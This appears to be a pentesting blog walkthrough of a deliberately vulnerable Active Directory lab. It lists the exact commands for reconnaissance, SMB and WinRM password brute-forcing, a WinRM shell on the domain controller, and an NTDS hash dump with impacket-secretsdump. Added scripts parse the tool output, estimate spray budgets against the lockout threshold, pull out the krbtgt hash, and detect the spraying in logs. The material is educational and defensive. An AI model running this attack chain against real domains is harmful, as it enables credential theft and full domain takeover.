Building and Breaking a Vulnerable Active Directory Lab: Full Exploitation Walkthrough

2025-12-29 4 min read Active Directory Pentesting Labs

Introduction

Active Directory attacks are best learned hands-on. Theory explains what AD is, but exploitation teaches why it fails. This post documents a full attack lifecycle against a deliberately vulnerable Active Directory environment — including exact commands, decision points, and why each step works.

The vulnerable lab server can be created using the public script available here:

Hacklab-AD

What follows is not a checklist. It is an attack narrative, grounded in real tooling and real outcomes.


Lab Setup Overview

The lab consists of:

  • A Windows Server acting as a Domain Controller
  • Domain: lab.local
  • Multiple intentionally weak user and service accounts
  • Misconfigured privileges and legacy hygiene issues

Once the setup script from the repository is executed, the environment is ready for exploitation.

Step 1: Network Reconnaissance

The first goal is to confirm whether the target is an Active Directory Domain Controller.

nmap -sC -sV -p- 192.168.198.10

Key indicators from the output:

  • Kerberos on port 88
  • LDAP on 389 / 636
  • SMB on 445
  • WinRM on 5985
  • Hostname DC01
  • Domain name exposed via LDAP: lab.local

At this point, we already know: This is a Domain Controller, and credentials will be the fastest path forward.

Step 2: SMB Password Brute Force (Initial Foothold)

Rather than spraying one password blindly across every account, we run NetExec against SMB with a curated username list and a full wordlist. Without --continue-on-success, nxc stops at the first valid pair, which is all that is needed for a foothold. Outside a lab, pull the domain lockout policy first (nxc's --pass-pol): a full wordlist against every user locks accounts within seconds and is a noisy, destructive way to start.

nxc smb 192.168.198.10 \
  -u /usr/share/wordlists/seclists/Usernames/cirt-default-usernames.txt \
  -p /usr/share/wordlists/rockyou.txt \
  --ignore-pw-decoding

Successful authentication:

lab.local\WebAdmin:princess

This single credential unlocks enumeration across the domain.

Step 3: Enumerating Domain Users

Using the valid SMB credentials:

nxc smb 192.168.198.10 -u WebAdmin -p princess --users

This returns the full domain user list, with the last password change, bad-password count and description field for each account. Reading it reveals:

  • Regular users
  • Service accounts (scanner, mysql, www)
  • Backup and operator accounts (admin.backup)
  • Account descriptions, a common place for hints or even passwords to leak

Note that --users does not show Kerberos pre-authentication or delegation settings; identifying AS-REP roastable or delegation-enabled accounts takes an LDAP query or a dedicated roasting pass, which this walkthrough does not need.

This step is critical. From here on, attacks become targeted, not probabilistic.

Step 4: Full Credential Compromise (Targeted Brute Force)

Extract usernames and brute-force them systematically:

# users.txt is the saved output of the --users run above; column 5 is the
# username. Skip nxc's banner/status rows ("[*]", "[+]") and the table header.
awk '$5 !~ /^\[/ && $5 != "-Username-" {print $5}' users.txt > all_users.txt

nxc smb 192.168.198.10 \
  -u all_users.txt \
  -p /usr/share/wordlists/rockyou.txt \
  --continue-on-success \
  --ignore-pw-decoding

Multiple valid credentials are discovered:

jane.smith:password
chris:000000
scanner:welcome
mysql:letmein
subspace:trustno1

At this point, password reuse and weak policy have collapsed identity security.
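The spray and brute-force steps (Steps 2 through 4, and the WinRM check in Step 6) all hinge on turning NetExec output into the next input: usernames out of --users, valid pairs out of the "[+]" lines, and a lockout budget out of --pass-pol before any guessing starts. The following helper script is an added example and is not part of the original post or of NetExec; every sample line in it is constructed to mimic nxc's column layout (tool, IP, port, hostname, then the payload) and should be checked against the output of your own nxc version before you trust the field numbers.

```shell
#!/bin/sh
# Added example (not from the original post): helpers around NetExec output
# for the spray/brute-force steps. All sample output below is constructed.
set -eu

# Constructed output of: nxc smb 192.168.198.10 -u WebAdmin -p princess --users
NXC_USERS_OUTPUT='SMB  192.168.198.10  445  DC01  [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:lab.local) (signing:True) (SMBv1:False)
SMB  192.168.198.10  445  DC01  [+] lab.local\WebAdmin:princess
SMB  192.168.198.10  445  DC01  -Username-     -Last PW Set-        -BadPW-  -Description-
SMB  192.168.198.10  445  DC01  Administrator  2025-12-01 10:02:11  0        Built-in account for administering the computer/domain
SMB  192.168.198.10  445  DC01  jane.smith     2025-12-01 10:05:40  0
SMB  192.168.198.10  445  DC01  admin.backup   2025-12-01 10:06:02  0        Backup operator
SMB  192.168.198.10  445  DC01  mysql          2025-12-01 10:06:30  0        Service account'

# Constructed output of a credential check run with --continue-on-success
NXC_AUTH_OUTPUT='SMB  192.168.198.10  445  DC01  [-] lab.local\jane.smith:123456 STATUS_LOGON_FAILURE
SMB  192.168.198.10  445  DC01  [+] lab.local\jane.smith:password
SMB  192.168.198.10  445  DC01  [+] lab.local\chris:000000
SMB  192.168.198.10  445  DC01  [+] lab.local\admin.backup:admin (Pwn3d!)'

# Constructed output of: nxc smb 192.168.198.10 -u WebAdmin -p princess --pass-pol
NXC_PASSPOL_OUTPUT='SMB  192.168.198.10  445  DC01  [+] Dumping password info for domain: LAB
SMB  192.168.198.10  445  DC01  Minimum password length: 7
SMB  192.168.198.10  445  DC01  Account Lockout Threshold: 5
SMB  192.168.198.10  445  DC01  Reset Account Lockout Counter: 30 minutes
SMB  192.168.198.10  445  DC01  Locked Account Duration: 30 minutes'

# Username list from --users output: column 5 is the username on table rows.
# Banner ([*]), status ([+]/[-]) and the header row are skipped.
extract_usernames() {
  awk '$5 !~ /^\[/ && $5 != "-Username-" { print $5 }'
}

# Valid credentials from any nxc run: "[+] DOMAIN\user:pass" becomes "user:pass".
# Trailing markers such as "(Pwn3d!)" sit in a later field and are dropped.
# (Passwords containing spaces would be truncated by the whitespace split.)
extract_valid_creds() {
  awk '$5 == "[+]" && index($6, ":") { sub(/.*\\/, "", $6); print $6 }'
}

# Guesses per account that stay below the lockout threshold, i.e. the budget
# for one observation window. Prints "unlimited" when the policy has no threshold.
safe_attempts() {
  awk -F': ' '/Account Lockout Threshold/ {
    if ($2 == "None") print "unlimited"; else print $2 - 1
  }'
}

# Stand-alone demo: the same three steps the walkthrough performs by hand.
printf '%s\n' "$NXC_USERS_OUTPUT"   | extract_usernames
printf '%s\n' "$NXC_AUTH_OUTPUT"    | extract_valid_creds
printf '%s\n' "$NXC_PASSPOL_OUTPUT" | safe_attempts
```

In practice the three functions are fed from saved nxc output (nxc smb ... --users > users.txt, then extract_usernames < users.txt) rather than from the constants above; the lockout budget is the number to compare against the size of your password list before a spray leaves every account locked.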

Step 5: Web Enumeration (Credential Leakage)

Web services often leak supporting data.

gobuster dir \
  -u http://192.168.198.10 \
  -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt \
  -x txt,zip,bak

Interesting findings:

/users.txt
/passwords.txt

This reinforces a common lesson: web misconfigurations amplify identity compromise.

Step 6: Testing WinRM Access

Not all credentials work everywhere. We now test WinRM explicitly, using the two files recovered from the web server in Step 5. With --no-bruteforce, nxc pairs line N of users.txt with line N of passwords.txt instead of trying every combination, which is the right mode when the two files are a matched dump.

nxc winrm 192.168.198.10 \
  -u users.txt \
  -p passwords.txt \
  --no-bruteforce

Successful login:

lab.local\www:shadow (Pwn3d!)

WinRM access to a Domain Controller is a serious escalation.

Step 7: Interactive Shell on the Domain Controller

evil-winrm -u www -p shadow -i 192.168.198.10

Verify context:

whoami
lab\www

Enumerate groups:

net group "Domain Admins"

Result:

admin.backup
Administrator

Now we know which account actually controls the domain.

Step 8: Domain Admin Credential Discovery

Brute-force the backup admin account:

nxc winrm 192.168.198.10 \
  -u admin.backup \
  -p /usr/share/wordlists/rockyou.txt \
  --ignore-pw-decoding

Success:

lab.local\admin.backup:admin (Pwn3d!)

At this point, the domain is functionally lost.

Step 9: Dumping the Domain (NTDS)

With Domain Admin privileges:

impacket-secretsdump lab.local/admin.backup:admin@192.168.198.10 -use-vss

This extracts:

  • All domain password hashes
  • Kerberos keys
  • Service account secrets
  • Machine account credentials

From here:

  • Pass-the-hash is trivial: every NT hash in the dump authenticates over SMB or WinRM without the password
  • Golden tickets are possible, because the krbtgt hash is in the dump
  • Long-term persistence is guaranteed until every secret in the dump is rotated (krbtgt twice)

This is the point of no return.
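Once the NTDS dump is on disk, the next question is what it proves about the domain. The script below is an added example, not part of the original post or of Impacket: it triages a constructed dump written in secretsdump's "domain\user:rid:lmhash:nthash:::" layout, finding accounts that share an NT hash (password reuse, invisible from the wordlist results alone), accounts that still carry an LM hash, and the krbtgt NT hash that a golden ticket needs. The hashes for "password" (NT 8846f7ea..., LM e52cac67...) and "admin" (NT 209c6174...) are the real values; every other hash and the extra account names (svc.backup, helpdesk, legacy.svc) are placeholders invented for the sample.

```shell
#!/bin/sh
# Added example (not from the original post): post-processing an NTDS dump.
# NTDS_DUMP is constructed in secretsdump's "domain\user:rid:lm:nt:::" format;
# only the hashes of "password" and "admin" are real, the rest are placeholders.
set -eu

# secretsdump prints this LM value for accounts that have no LM hash stored.
EMPTY_LM='aad3b435b51404eeaad3b435b51404ee'

NTDS_DUMP='[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
lab.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:3b1a2c4d5e6f708192a3b4c5d6e7f809:::
lab.local\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0f4b6b7e1c2d3a4b5c6d7e8f90a1b2c3:::
lab.local\admin.backup:1104:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
lab.local\svc.backup:1105:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
lab.local\jane.smith:1106:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
lab.local\helpdesk:1107:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
lab.local\www:1108:aad3b435b51404eeaad3b435b51404ee:9a7b8c6d5e4f30211203f4e5d6c7b8a9:::
lab.local\legacy.svc:1109:e52cac67419a9a224a3b108f3fa6cb6d:4a1b2c3d4e5f60718293a4b5c6d7e8f9:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:1a2b3c4d5e6f708192a3b4c5d6e7f801:::'

# NT hashes shared by more than one account, with the accounts that share them.
# Only rows whose second field is a numeric RID are treated as hash lines.
nt_reuse() {
  awk -F: '$2 ~ /^[0-9]+$/ {
    u = $1; sub(/.*\\/, "", u)                     # strip "domain\"
    users[$4] = (users[$4] == "" ? u : users[$4] "," u)
    count[$4]++
  } END {
    for (h in users) if (count[h] > 1) print h, users[h]
  }' | sort
}

# Accounts that still have a real LM hash: the password is at most 14
# characters and LM cracking is near-instant regardless of complexity.
lm_present() {
  awk -F: -v empty="$EMPTY_LM" '$2 ~ /^[0-9]+$/ && $3 != empty {
    u = $1; sub(/.*\\/, "", u); print u
  }'
}

# The krbtgt NT hash: the one value a golden ticket is forged from, and the
# one that must be rotated twice to invalidate such tickets.
krbtgt_nt() {
  awk -F: '$2 ~ /^[0-9]+$/ {
    u = $1; sub(/.*\\/, "", u)
    if (u == "krbtgt") print $4
  }'
}

# Stand-alone demo
printf '%s\n' "$NTDS_DUMP" | nt_reuse
printf '%s\n' "$NTDS_DUMP" | lm_present
printf '%s\n' "$NTDS_DUMP" | krbtgt_nt
```

Run it against a real secretsdump output file (nt_reuse < ntds.txt) and the reuse report is usually the most persuasive artifact in a report: a privileged account sharing its hash with a service account is a finding on its own, before anything is cracked.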

Why This Attack Works

Nothing here is exotic.

  • Weak passwords
  • Excessive privileges
  • Poor credential monitoring
  • Service account neglect
  • Domain Controller exposure

Active Directory did exactly what it was configured to do.

Defensive Takeaways

  • Enforce strong, unique passwords
  • Monitor authentication failures centrally
  • Tier administrative access
  • Audit backup and service accounts
  • Treat WinRM on DCs as critical exposure
  • Assume breach — design for containment
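The attack above leaves an unmistakable trail in Domain Controller security logs: one source address failing against many accounts (the sprays in Steps 2 and 4), many failures against one account (Step 8), and successful logons that follow failures from the same source (Steps 2, 6 and 8). The script below is an added example, not code from the original post; it runs three such detections over constructed event lines in a simplified "timestamp,event_id,target_user,source_ip,status" CSV that stands in for exported 4625/4624 events. Thresholds and the CSV layout are assumptions; a production rule would additionally bucket by time window.

```shell
#!/bin/sh
# Added example (not from the original post): spray / brute-force / foothold
# detection over constructed Windows logon events. 4625 = failed logon,
# 4624 = successful logon, 0xC000006A = wrong password. The CSV layout and
# thresholds are assumptions for this example.
set -eu

SPRAY_THRESHOLD=5   # distinct accounts failed from one source
BRUTE_THRESHOLD=5   # failures against one account

# Constructed events: a spray from .50, an ordinary user typo from .77,
# a brute force of admin.backup from .50, and two successes after failures.
EVENTS='2025-12-29T10:00:01Z,4625,WebAdmin,192.168.198.50,0xC000006A
2025-12-29T10:00:01Z,4625,jane.smith,192.168.198.50,0xC000006A
2025-12-29T10:00:02Z,4625,chris,192.168.198.50,0xC000006A
2025-12-29T10:00:02Z,4625,scanner,192.168.198.50,0xC000006A
2025-12-29T10:00:03Z,4625,mysql,192.168.198.50,0xC000006A
2025-12-29T10:00:03Z,4625,subspace,192.168.198.50,0xC000006A
2025-12-29T10:00:04Z,4624,WebAdmin,192.168.198.50,-
2025-12-29T10:01:00Z,4625,alice,192.168.198.77,0xC000006A
2025-12-29T10:02:00Z,4625,alice,192.168.198.77,0xC000006A
2025-12-29T10:05:00Z,4625,admin.backup,192.168.198.50,0xC000006A
2025-12-29T10:05:01Z,4625,admin.backup,192.168.198.50,0xC000006A
2025-12-29T10:05:01Z,4625,admin.backup,192.168.198.50,0xC000006A
2025-12-29T10:05:02Z,4625,admin.backup,192.168.198.50,0xC000006A
2025-12-29T10:05:02Z,4625,admin.backup,192.168.198.50,0xC000006A
2025-12-29T10:05:03Z,4625,admin.backup,192.168.198.50,0xC000006A
2025-12-29T10:05:04Z,4624,admin.backup,192.168.198.50,-'

# Password spray: sources whose failures span >= SPRAY_THRESHOLD distinct accounts.
# Prints "source_ip distinct_accounts".
spray_sources() {
  awk -F, -v t="$SPRAY_THRESHOLD" '
    $2 == 4625 { if (!seen[$4 SUBSEP $3]++) distinct[$4]++ }
    END { for (ip in distinct) if (distinct[ip] >= t) print ip, distinct[ip] }' | sort
}

# Brute force: accounts with >= BRUTE_THRESHOLD failures from any source.
# Prints "account failures".
brute_forced_accounts() {
  awk -F, -v t="$BRUTE_THRESHOLD" '
    $2 == 4625 { fails[$3]++ }
    END { for (u in fails) if (fails[u] >= t) print u, fails[u] }' | sort
}

# Foothold: a success for an account from a source that previously failed
# against that same account. Prints "source_ip account prior_failures"
# in event order; this is the line that says a guess worked.
success_after_failures() {
  awk -F, '
    $2 == 4625 { fails[$4 SUBSEP $3]++ }
    $2 == 4624 && fails[$4 SUBSEP $3] > 0 { print $4, $3, fails[$4 SUBSEP $3] }'
}

# Stand-alone demo
printf '%s\n' "$EVENTS" | spray_sources
printf '%s\n' "$EVENTS" | brute_forced_accounts
printf '%s\n' "$EVENTS" | success_after_failures
```

The third rule is the one worth paging on: a spray or brute force against a DC is noisy but common, while a success preceded by failures from the same source is the moment the foothold in Step 2 (and the Domain Admin login in Step 8) actually happened, and it is only visible if DC logs are collected centrally rather than left on the host the attacker now controls.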

Conclusion

This lab demonstrates a brutal truth: Active Directory rarely falls to exploits. It falls to habits.

The most dangerous attacker is not the one with zero-days, but the one who understands how organizations actually operate their identity infrastructure.

If you can build this lab, you can break it. If you can break it, you can defend it.
